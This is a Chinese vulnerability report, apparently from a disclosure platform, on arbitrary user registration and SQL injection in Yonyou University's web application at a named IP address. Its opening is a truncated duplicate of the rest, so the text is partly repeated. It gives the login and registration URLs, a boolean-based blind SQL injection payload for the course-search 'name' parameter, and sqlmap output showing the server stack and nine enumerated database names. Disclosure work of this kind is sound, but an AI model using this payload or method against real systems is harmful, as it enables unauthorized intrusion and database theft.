### 简要描述: 用友大学任意用户注册+sql注射 ### 详细说明: 用友大学任意用户注册+sql注射,随便注册一个账户进行登录,然后在课程搜索的位置进行截断注入 登录:http://123.103.9.77/WebLogin.aspx 注册:http://123.103.9.77/User_Regist.aspx ### 漏洞证明: [<img src="https://images.seebug.org/upload/201511/26145851020311d0ba3ccbf322dd6bbc64a0f9c6.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/26145851020311d0ba3ccbf322dd6bbc64a0f9c6.png) 注入参数: sqlmap resumed the following injection point(s) from stored session: --- Parameter: name (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: order=z_products&isget=all&name=NC%E4%BE%9B%E5%BA%94%E9%93%BE%E9%AB %98%E7%BA%A7%E8%AE%A4%E8%AF%81%' AND 5431=5431 AND '%'=' [14:55:39] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2012 [14:55:39] [INFO] fetching database...
### 简要描述: 用友大学任意用户注册+sql注射 ### 详细说明: 用友大学任意用户注册+sql注射,随便注册一个账户进行登录,然后在课程搜索的位置进行截断注入 登录:http://123.103.9.77/WebLogin.aspx 注册:http://123.103.9.77/User_Regist.aspx ### 漏洞证明: [<img src="https://images.seebug.org/upload/201511/26145851020311d0ba3ccbf322dd6bbc64a0f9c6.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/26145851020311d0ba3ccbf322dd6bbc64a0f9c6.png) 注入参数: sqlmap resumed the following injection point(s) from stored session: --- Parameter: name (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: order=z_products&isget=all&name=NC%E4%BE%9B%E5%BA%94%E9%93%BE%E9%AB %98%E7%BA%A7%E8%AE%A4%E8%AF%81%' AND 5431=5431 AND '%'=' [14:55:39] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2012 [14:55:39] [INFO] fetching database names [14:55:39] [INFO] the SQL query used returns 9 entries [14:55:39] [INFO] resumed: 155_PX_New_yy [14:55:39] [INFO] resumed: master [14:55:39] [INFO] resumed: model [14:55:39] [INFO] resumed: msdb [14:55:39] [INFO] resumed: ReportServer [14:55:39] [INFO] resumed: ReportServerTempDB [14:55:39] [INFO] resumed: tempdb [14:55:39] [INFO] resumed: Timber_PX_New_test [14:55:39] [INFO] resumed: Timber_PX_New_yy available databases [9]: [*] 155_PX_New_yy [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb [*] Timber_PX_New_test [*] Timber_PX_New_yy